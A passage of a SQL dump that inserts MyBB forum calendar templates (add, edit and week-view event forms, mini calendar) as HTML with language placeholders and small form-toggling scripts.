{$lang->friday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\" colspan=\"2\"><label><input type=\"checkbox\" name=\"repeats_3_days[6]\" value=\"1\" {$repeats_3_days[6]} style=\"vertical-align: middle;\" /> {$lang->saturday}</label></td> </tr> </table> </div> <div class=\"repeats_type\" id=\"repeats_type_4\" style=\"padding: 4px;\"> <div class=\"smalltext\"><label> <input type=\"radio\" name=\"repeats_4_type\" id=\"repeats_4_type_1\" value=\"1\" style=\"vertical-align: middle;\" {$repeats_4_type[1]} /> {$lang->repeats_on_day}</label> <input type=\"text\" class=\"textbox\" name=\"repeats_4_day\" value=\"{$repeats_4_day}\" onfocus=\"$(\'repeats_4_type_1\').checked=true;\" size=\"2\" /> {$lang->of_every} <input type=\"text\" class=\"textbox\" name=\"repeats_4_months\" value=\"{$repeats_4_months}\" size=\"2\" onfocus=\"$(\'repeats_4_type_1\').checked=true;\" /> {$lang->month_or_months} </div> <div class=\"smalltext\" style=\"margin-top: 5px;\"><label> <input type=\"radio\" name=\"repeats_4_type\" id=\"repeats_4_type_2\" value=\"2\" style=\"vertical-align: middle;\" {$repeats_4_type[2]} /> {$lang->repeats_on_the}</label> <select name=\"repeats_4_occurance\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\"> <option value=\"1\"{$repeats_4_occurance[1]}>{$lang->first}</option> <option value=\"2\"{$repeats_4_occurance[2]}>{$lang->second}</option> <option value=\"3\"{$repeats_4_occurance[3]}>{$lang->third}</option> <option value=\"4\"{$repeats_4_occurance[4]}>{$lang->fourth}</option> <option value=\"last\"{$repeats_4_occurance[\'last\']}>{$lang->last}</option> </select> <select name=\"repeats_4_weekday\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\"> <option value=\"0\"{$repeats_4_weekday[0]}>{$lang->sunday}</option> <option value=\"1\"{$repeats_4_weekday[1]}>{$lang->monday}</option> <option value=\"2\"{$repeats_4_weekday[2]}>{$lang->tuesday}</option> <option value=\"3\"{$repeats_4_weekday[3]}>{$lang->wednesday}</option> <option value=\"4\"{$repeats_4_weekday[4]}>{$lang->thursday}</option> <option value=\"5\"{$repeats_4_weekday[5]}>{$lang->friday}</option> <option value=\"6\"{$repeats_4_weekday[6]}>{$lang->saturday}</option> </select> {$lang->of_every} <input type=\"text\" class=\"textbox\" name=\"repeats_4_months2\" value=\"{$repeats_4_months2}\" size=\"2\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\" /> {$lang->month_or_months} </div> </div> <div class=\"repeats_type\" id=\"repeats_type_5\" style=\"padding: 4px;\"> <div class=\"smalltext\"><label> <input type=\"radio\" name=\"repeats_5_type\" value=\"1\" id=\"repeats_5_type_1\" style=\"vertical-align: middle;\" {$repeats_5_type[1]} /> {$lang->repeats_on}</label> <input type=\"text\" class=\"textbox\" name=\"repeats_5_day\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" value=\"{$repeats_5_day}\" size=\"2\" /> <select name=\"repeats_5_month\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" > <option value=\"1\"{$repeats_5_month[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$repeats_5_month[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$repeats_5_month[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$repeats_5_month[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$repeats_5_month[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$repeats_5_month[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$repeats_5_month[\'7\']}>{$lang->month_7}</option> <option value=\"8\"{$repeats_5_month[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$repeats_5_month[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$repeats_5_month[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$repeats_5_month[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$repeats_5_month[\'12\']}>{$lang->month_12}</option> </select> {$lang->every} <input type=\"text\" class=\"textbox\" name=\"repeats_5_years\" value=\"{$repeats_5_years}\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" size=\"2\" /> {$lang->year_or_years} </div> <div class=\"smalltext\" style=\"margin-top: 5px;\"><label> <input type=\"radio\" name=\"repeats_5_type\" value=\"2\" id=\"repeats_5_type_2\" style=\"vertical-align: middle;\" {$repeats_5_type[2]} /> {$lang->repeats_on_the}</label> <select name=\"repeats_5_occurance\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" > <option value=\"1\"{$repeats_5_occurance[1]}>{$lang->first}</option> <option value=\"2\"{$repeats_5_occurance[2]}>{$lang->second}</option> <option value=\"3\"{$repeats_5_occurance[3]}>{$lang->third}</option> <option value=\"4\"{$repeats_5_occurance[4]}>{$lang->fourth}</option> <option value=\"last\"{$repeats_4_occurance[\'last\']}>{$lang->last}</option> </select> <select name=\"repeats_5_weekday\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" > <option value=\"0\"{$repeats_5_weekday[0]}>{$lang->sunday}</option> <option value=\"1\"{$repeats_5_weekday[1]}>{$lang->monday}</option> <option value=\"2\"{$repeats_5_weekday[2]}>{$lang->tuesday}</option> <option value=\"3\"{$repeats_5_weekday[3]}>{$lang->wednesday}</option> <option value=\"4\"{$repeats_5_weekday[4]}>{$lang->thursday}</option> <option value=\"5\"{$repeats_5_weekday[5]}>{$lang->friday}</option> <option value=\"6\"{$repeats_5_weekday[6]}>{$lang->saturday}</option> </select> {$lang->of} <select name=\"repeats_5_month2\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" > <option value=\"1\"{$repeats_5_month2[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$repeats_5_month2[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$repeats_5_month2[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$repeats_5_month2[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$repeats_5_month2[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$repeats_5_month2[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$repeats_5_month2[\'7\']}>{$lang->month_7}</option> <option value=\"8\"{$repeats_5_month2[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$repeats_5_month2[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$repeats_5_month2[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$repeats_5_month2[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$repeats_5_month2[\'12\']}>{$lang->month_12}</option> </select> {$lang->every} <input type=\"text\" class=\"textbox\" name=\"repeats_5_years2\" value=\"{$repeats_5_years}\" size=\"2\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" /> {$lang->year_or_years} </div> </div> </td> </tr> </table> </dd> </dl> <script type=\"text/javascript\"> <!-- toggleType(); toggleRepeats(); // --> </script> </td> </tr> <tr> <td valign=\"top\" width=\"20%\" class=\"trow1\"><strong>{$lang->event_details}</strong>{$smilieinserter}</td> <td class=\"trow1\"><textarea name=\"description\" id=\"message\" rows=\"20\" cols=\"70\">{$description}</textarea> {$codebuttons}</td> </tr> <tr> <td width=\"20%\" class=\"trow2\"><strong>{$lang->event_options}</strong></td> <td class=\"trow2\"> <input type=\"checkbox\" class=\"checkbox\" name=\"private\" value=\"1\"{$privatecheck} /><span class=\"smalltext\">{$lang->private_option}</span><br /> </td> </tr> </table> <br /> <input type=\"hidden\" name=\"action\" value=\"do_addevent\" /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->post_event}\" /></div> </form> {$footer} </body> </html>', '-2', '1402', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('474', 'calendar_addprivateevent', '<a href=\"calendar.php?action=addevent&amp;calendar={$calendar[\'cid\']}&amp;private=1\">{$lang->add_private_event}</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('475', 'calendar_addpublicevent', '<a href=\"calendar.php?action=addevent&amp;calendar={$calendar[\'cid\']}\">{$lang->add_public_event}</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('476', 'calendar_eventbit_private', '<div style=\"margin-bottom: 4px;\" class=\"smalltext eventbit_private\"><a href=\"{$event[\'eventlink\']}\" title=\"{$event[\'fullname\']}\">{$event[\'name\']}</a></div>', '-2', '1402', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('477', 'calendar_eventbit', '<div style=\"margin-bottom: 4px;\" class=\"smalltext {$event_class}\"><a href=\"{$event[\'eventlink\']}\" title=\"{$event[\'fullname\']}\">{$event[\'name\']}</a></div>', '-2', '1402', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('478', 'calendar_weekview', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->calendar}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"> <tr> <td width=\"100%\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\" colspan=\"2\"> <div class=\"float_right\"> <a href=\"{$prev_link}\">&laquo; {$lang->previous_week}</a> | <a href=\"{$next_link}\">{$lang->next_week} &raquo;</a> </div> <div><strong>{$lang->weekly_overview} ({$friendly_week_from} - {$friendly_week_to})</strong></div> </td> </tr> </thead> <tbody> {$weekday_bits} </tbody> </table> </td> <td style=\"padding-left: 10px; vertical-align: top;\">{$mini_calendars}</td> </tr> </table> <br /> <form action=\"calendar.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\"> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td class=\"trow1\" valign=\"top\">{$addevent}</td> <td class=\"trow1\" align=\"right\"> <span class=\"smalltext\"><strong>{$lang->jump_month}</strong></span> <select name=\"month\"> <option value=\"{$week_from[1]}\">{$monthnames[$week_from_one]}</option> <option value=\"{$week_from[1]}\">----------</option> <option value=\"1\">{$lang->alt_month_1}</option> <option value=\"2\">{$lang->alt_month_2}</option> <option value=\"3\">{$lang->alt_month_3}</option> <option value=\"4\">{$lang->alt_month_4}</option> <option value=\"5\">{$lang->alt_month_5}</option> <option value=\"6\">{$lang->alt_month_6}</option> <option value=\"7\">{$lang->alt_month_7}</option> <option value=\"8\">{$lang->alt_month_8}</option> <option value=\"9\">{$lang->alt_month_9}</option> <option value=\"10\">{$lang->alt_month_10}</option> <option value=\"11\">{$lang->alt_month_11}</option> <option value=\"12\">{$lang->alt_month_12}</option> </select> <select name=\"year\"> <option value=\"{$week_from[2]}\">{$week_from[2]}</option> <option value=\"{$week_from[2]}\">----------</option> {$yearsel} </select> {$gobutton} <br /><br /> <span class=\"smalltext\"><strong>{$lang->jump_to_calendar}</strong></span> {$calendar_jump} {$gobutton} </td> </tr> </table> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1603', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('479', 'calendar_weekview_month', ' <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$weekday_month} {$weekday_year}</strong></td> </tr> {$days}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('480', 'calendar_weekview_day', ' <tr> <td class=\"trow_sep\" colspan=\"2\">{$weekday_name}</td> </tr> <tr> <td class=\"trow2{$day_shaded}\" style=\"text-align: center; padding: 8px;\"><span class=\"largetext\">{$weekday_day}</span></td> <td class=\"trow1\" width=\"100%\">{$day_birthdays}{$day_events}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('481', 'calendar_weekview_day_event', '<a href=\"{$event[\'eventlink\']}\" class=\"{$event_class}\" title=\"{$event[\'fullname\']}\">{$event[\'fullname\']}</a>{$event_time}<br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('482', 'calendar_mini', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"width: 180px;\"> <thead> <tr> <td class=\"thead\" colspan=\"8\"> <strong><a href=\"{$month_link}\">{$monthnames[$month]} {$year}</a></strong> </td> </tr> <tr> <td class=\"tcat\">&nbsp;</td> {$weekday_headers} </tr> </thead> <tbody> {$calendar_rows} </tbody> </table>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('483', 'calendar_mini_weekdayheader', ' <td class=\"tcat\" align=\"center\" width=\"14%\"><strong>{$weekday_name}</strong></td>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('484', 'calendar_mini_weekrow', ' <tr> <td class=\"tcat\" align=\"center\" width=\"1\"><a href=\"{$week_link}\">&raquo;</a></td> {$day_bits} </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('485', 'calendar_mini_weekrow_day', ' <td class=\"{$day_class}\" valign=\"middle\" align=\"center\"> {$day_link} </td>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('486', 'calendar_addeventlink', '<a href=\"calendar.php?action=addevent&amp;calendar={$calendar[\'cid\']}\">{$lang->add_public_event}</a> | <a href=\"calendar.php?action=addevent&amp;calendar={$calendar[\'cid\']}&amp;private=1\">{$lang->add_private_event}</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('487', 'calendar_editevent', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->calendar} - {$lang->edit_event}</title> {$headerinclude} </head> <body> {$header} {$event_errors} <form action=\"calendar.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_event}</strong></td> </tr> <tr> <td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /> <strong>{$lang->delete_q}</strong></td> <td class=\"trow1\" width=\"100%\">{$lang->delete_1}<br /><span class=\"smalltext\">{$lang->delete_2}</span></td> <td class=\"trow1\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_now}\" tabindex=\"10\" /></td> </tr> </table> <input type=\"hidden\" name=\"action\" value=\"do_editevent\" /> <input type=\"hidden\" name=\"eid\" value=\"{$event[\'eid\']}\" /> </form> <br /> <form action=\"calendar.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\"> <tr> <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->edit_event}</strong></td> </tr> <tr> <td width=\"20%\" class=\"trow1\"><strong>{$lang->event_name}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"name\" maxlength=\"120\" value=\"{$name}\"/></td> </tr> <tr> <td class=\"trow2\" style=\"vertical-align: top;\"><strong>{$lang->event_date}</strong></td> <td class=\"trow1\"> <script type=\"text/javascript\"> <!-- function toggleType() { if($(\'type_single\').checked == true) { Element.hide(\'ranged_selects\'); Element.show(\'single_selects\'); } else { Element.hide(\'single_selects\'); Element.show(\'ranged_selects\'); toggleRepeats(); } } function toggleRepeats() { var repeats = $(\'repeats\').options[$(\'repeats\').selectedIndex].value; $$(\'.repeats_type\').each(function(e) { Element.hide(e); }); if($(\'repeats_type_\'+repeats)) { Element.show(\'repeats_type_\'+repeats); } } // --> </script> <dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\"> <dt><input type=\"radio\" name=\"type\" value=\"single\" {$type_single} id=\"type_single\" onclick=\"toggleType();\" /> <label for=\"type_single\"><strong>{$lang->type_single}</strong></label></dt> <dd style=\"margin-top: 4px;\" id=\"single_selects\"> <select name=\"single_day\"> {$single_days} </select> &nbsp; <select name=\"single_month\"> <option value=\"1\"{$single_month[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$single_month[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$single_month[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$single_month[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$single_month[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$single_month[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$single_month[\'7\']}>{$lang->month_7}</option> <option value=\"8\"{$single_month[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$single_month[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$single_month[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$single_month[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$single_month[\'12\']}>{$lang->month_12}</option> </select> &nbsp; <select name=\"single_year\"> {$single_years} </select> </dd> <dt><input type=\"radio\" name=\"type\" value=\"ranged\" {$type_ranged} id=\"type_ranged\" onclick=\"toggleType();\" /> <label for=\"type_ranged\"><strong>{$lang->type_ranged}</strong></label></dt> <dd style=\"margin-top: 4px; width: 100%;\" id=\"ranged_selects\"> <table width=\"100%\"> <tr> <td class=\"smalltext\" style=\"padding: 4px; text-align: right;\">{$lang->start_time}</td> <td style=\"padding: 4px;\"> <select name=\"start_day\"> {$start_days} </select> <select name=\"start_month\"> <option value=\"1\"{$start_month[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$start_month[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$start_month[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$start_month[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$start_month[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$start_month[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$start_month[\'7\']}>{$lang->month_7}</option> <option value=\"8\"{$start_month[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$start_month[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$start_month[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$start_month[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$start_month[\'12\']}>{$lang->month_12}</option> </select> <select name=\"start_year\"> {$start_years} </select> <span class=\"smalltext\">&nbsp;&nbsp;&nbsp;{$lang->enter_time}</span> <input type=\"text\" class=\"textbox\" name=\"start_time\" value=\"{$start_time}\" size=\"7\" /> </td> </tr> <tr> <td class=\"smalltext\" style=\"padding: 4px; text-align: right;\">{$lang->end_time}</td> <td style=\"padding: 4px;\"> <select name=\"end_day\"> {$end_days} </select> <select name=\"end_month\"> <option value=\"1\"{$end_month[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$end_month[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$end_month[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$end_month[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$end_month[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$end_month[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$end_month[\'7\']}>{$lang->month_7}</option> <option value=\"8\"{$end_month[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$end_month[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$end_month[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$end_month[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$end_month[\'12\']}>{$lang->month_12}</option> </select> <select name=\"end_year\"> {$end_years} </select> <span class=\"smalltext\">&nbsp;&nbsp;&nbsp;{$lang->enter_time}</span> <input type=\"text\" class=\"textbox\" name=\"end_time\" value=\"{$end_time}\" size=\"7\" /> </td> </tr> <tr> <td class=\"smalltext\" style=\"padding: 4px; text-align: right; vertical-align: top;\">{$lang->time_zone}</td> <td style=\"padding: 4px;\"> {$timezones}<br /> <label class=\"smalltext\" style=\"display: block; padding-top: 4px;\"><input type=\"checkbox\" name=\"ignoretimezone\" value=\"1\" {$ignore_timezone} style=\"vertical-align: middle;\" /> {$lang->ignore_timezone}</label> </td> </tr> <tr> <td class=\"smalltext\" style=\"padding: 4px; text-align: right; vertical-align:top;\">{$lang->repeats}</td> <td class=\"smalltext\" style=\"padding: 4px;\"> <select name=\"repeats\" id=\"repeats\" onchange=\"toggleRepeats();\"> <option value=\"0\">{$lang->does_not_repeat}</option> <option value=\"1\"{$repeats_sel[1]}>{$lang->repeats_daily}</option> <option value=\"2\"{$repeats_sel[2]}>{$lang->repeats_weekdays}</option> <option value=\"3\"{$repeats_sel[3]}>{$lang->repeats_weekly}</option> <option value=\"4\"{$repeats_sel[4]}>{$lang->repeats_monthly}</option> <option value=\"5\"{$repeats_sel[5]}>{$lang->repeats_yearly}</option> </select> <div class=\"repeats_type\" id=\"repeats_type_1\" style=\"padding: 4px;\"> {$lang->repeats_every} <input type=\"text\" class=\"textbox\" name=\"repeats_1_days\" value=\"{$repeats_1_days}\" size=\"2\" /> {$lang->day_or_days} </div> <div class=\"repeats_type\" id=\"repeats_type_3\" style=\"padding: 4px;\"> {$lang->repeats_every} <input type=\"text\" class=\"textbox\" name=\"repeats_3_weeks\" value=\"{$repeats_3_weeks}\" size=\"2\" /> {$lang->week_or_weeks_on} <br /> <table style=\"padding: 4px;\"> <tr> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[0]\" value=\"1\" {$repeats_3_days[0]} style=\"vertical-align: middle;\" /> {$lang->sunday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[1]\" value=\"1\" {$repeats_3_days[1]} style=\"vertical-align: middle;\" /> {$lang->monday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[2]\" value=\"1\" {$repeats_3_days[2]} style=\"vertical-align: middle;\" /> {$lang->tuesday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[3]\" value=\"1\" {$repeats_3_days[3]} style=\"vertical-align: middle;\" /> {$lang->wednesday}</label></td> </tr> <tr> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[4]\" value=\"1\" {$repeats_3_days[4]} style=\"vertical-align: middle;\" /> {$lang->thursday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[5]\" value=\"1\" {$repeats_3_days[5]} style=\"vertical-align: middle;\" /> {$lang->friday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\" colspan=\"2\"><label><input type=\"checkbox\" name=\"repeats_3_days[6]\" value=\"1\" {$repeats_3_days[6]} style=\"vertical-align: middle;\" /> {$lang->saturday}</label></td> </tr> </table> </div> <div class=\"repeats_type\" id=\"repeats_type_4\" style=\"padding: 4px;\"> <div class=\"smalltext\"><label> <input type=\"radio\" name=\"repeats_4_type\" id=\"repeats_4_type_1\" value=\"1\" style=\"vertical-align: middle;\" {$repeats_4_type[1]} /> {$lang->repeats_on_day}</label> <input type=\"text\" class=\"textbox\" name=\"repeats_4_day\" value=\"{$repeats_4_day}\" onfocus=\"$(\'repeats_4_type_1\').checked=true;\" size=\"2\" /> {$lang->of_every} <input type=\"text\" class=\"textbox\" name=\"repeats_4_months\" value=\"{$repeats_4_months}\" size=\"2\" onfocus=\"$(\'repeats_4_type_1\').checked=true;\" /> {$lang->month_or_months} </div> <div class=\"smalltext\" style=\"margin-top: 5px;\"><label> <input type=\"radio\" name=\"repeats_4_type\" id=\"repeats_4_type_2\" value=\"2\" style=\"vertical-align: middle;\" {$repeats_4_type[2]} /> {$lang->repeats_on_the}</label> <select name=\"repeats_4_occurance\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\"> <option value=\"1\"{$repeats_4_occurance[1]}>{$lang->first}</option> <option value=\"2\"{$repeats_4_occurance[2]}>{$lang->second}</option> <option value=\"3\"{$repeats_4_occurance[3]}>{$lang->third}</option> <option value=\"4\"{$repeats_4_occurance[4]}>{$lang->fourth}</option> <option value=\"last\"{$repeats_4_occurance[\'last\']}>{$lang->last}</option> </select> <select name=\"repeats_4_weekday\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\"> <option value=\"0\"{$repeats_4_weekday[0]}>{$lang->sunday}</option> <option value=\"1\"{$repeats_4_weekday[1]}>{$lang->monday}</option> <option value=\"2\"{$repeats_4_weekday[2]}>{$lang->tuesday}</option> <option value=\"3\"{$repeats_4_weekday[3]}>{$lang->wednesday}</option> <option value=\"4\"{$repeats_4_weekday[4]}>{$lang->thursday}</option> <option value=\"5\"{$repeats_4_weekday[5]}>{$lang->friday}</option> <option value=\"6\"{$repeats_4_weekday[6]}>{$lang->saturday}</option> </select> {$lang->of_every} <input type=\"text\" class=\"textbox\" name=\"repeats_4_months2\" value=\"{$repeats_4_months2}\" size=\"2\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\" /> {$lang->month_or_months} </div> </div> <div class=\"repeats_type\" id=\"repeats_type_5\" style=\"padding: 4px;\"> <div class=\"smalltext\"><label> <input type=\"radio\" name=\"repeats_5_type\" value=\"1\" id=\"repeats_5_type_1\" style=\"vertical-align: middle;\" {$repeats_5_type[1]} /> {$lang->repeats_on}</label> <input type=\"text\" class=\"textbox\" name=\"repeats_5_day\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" value=\"{$repeats_5_day}\" size=\"2\" /> <select name=\"repeats_5_month\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" > <option value=\"1\"{$repeats_5_month[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$repeats_5_month[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$repeats_5_month[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$repeats_5_month[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$repeats_5_month[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$repeats_5_month[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$repeats_5_month[\'7\']}>{$lang->month_7}</option> <option value=\"8\"{$repeats_5_month[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$repeats_5_month[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$repeats_5_month[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$repeats_5_month[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$repeats_5_month[\'12\']}>{$lang->month_12}</option> </select> {$lang->every} <input type=\"text\" class=\"textbox\" name=\"repeats_5_years\" value=\"{$repeats_5_years}\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" size=\"2\" /> {$lang->year_or_years} </div> <div class=\"smalltext\" style=\"margin-top: 5px;\"><label> <input type=\"radio\" name=\"repeats_5_type\" value=\"2\" id=\"repeats_5_type_2\" style=\"vertical-align: middle;\" {$repeats_5_type[2]} /> {$lang->repeats_on_the}</label> <select name=\"repeats_5_occurance\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" > <option value=\"1\"{$repeats_5_occurance[1]}>{$lang->first}</option> <option value=\"2\"{$repeats_5_occurance[2]}>{$lang->second}</option> <option value=\"3\"{$repeats_5_occurance[3]}>{$lang->third}</option> <option value=\"4\"{$repeats_5_occurance[4]}>{$lang->fourth}</option> <option value=\"last\"{$repeats_4_occurance[\'last\']}>{$lang->last}</option> </select> <select name=\"repeats_5_weekday\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" > <option value=\"0\"{$repeats_5_weekday[0]}>{$lang->sunday}</option> <option value=\"1\"{$repeats_5_weekday[1]}>{$lang->monday}</option> <option value=\"2\"{$repeats_5_weekday[2]}>{$lang->tuesday}</option> <option value=\"3\"{$repeats_5_weekday[3]}>{$lang->wednesday}</option> <option value=\"4\"{$repeats_5_weekday[4]}>{$lang->thursday}</option> <option value=\"5\"{$repeats_5_weekday[5]}>{$lang->friday}</option> <option value=\"6\"{$repeats_5_weekday[6]}>{$lang->saturday}</option> </select> {$lang->of} <select name=\"repeats_5_month2\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" > <option value=\"1\"{$repeats_5_month2[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$repeats_5_month2[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$repeats_5_month2[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$repeats_5_month2[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$repeats_5_month2[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$repeats_5_month2[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$repeats_5_month2[\'7\']}>{$lang->month_7}</option> <option 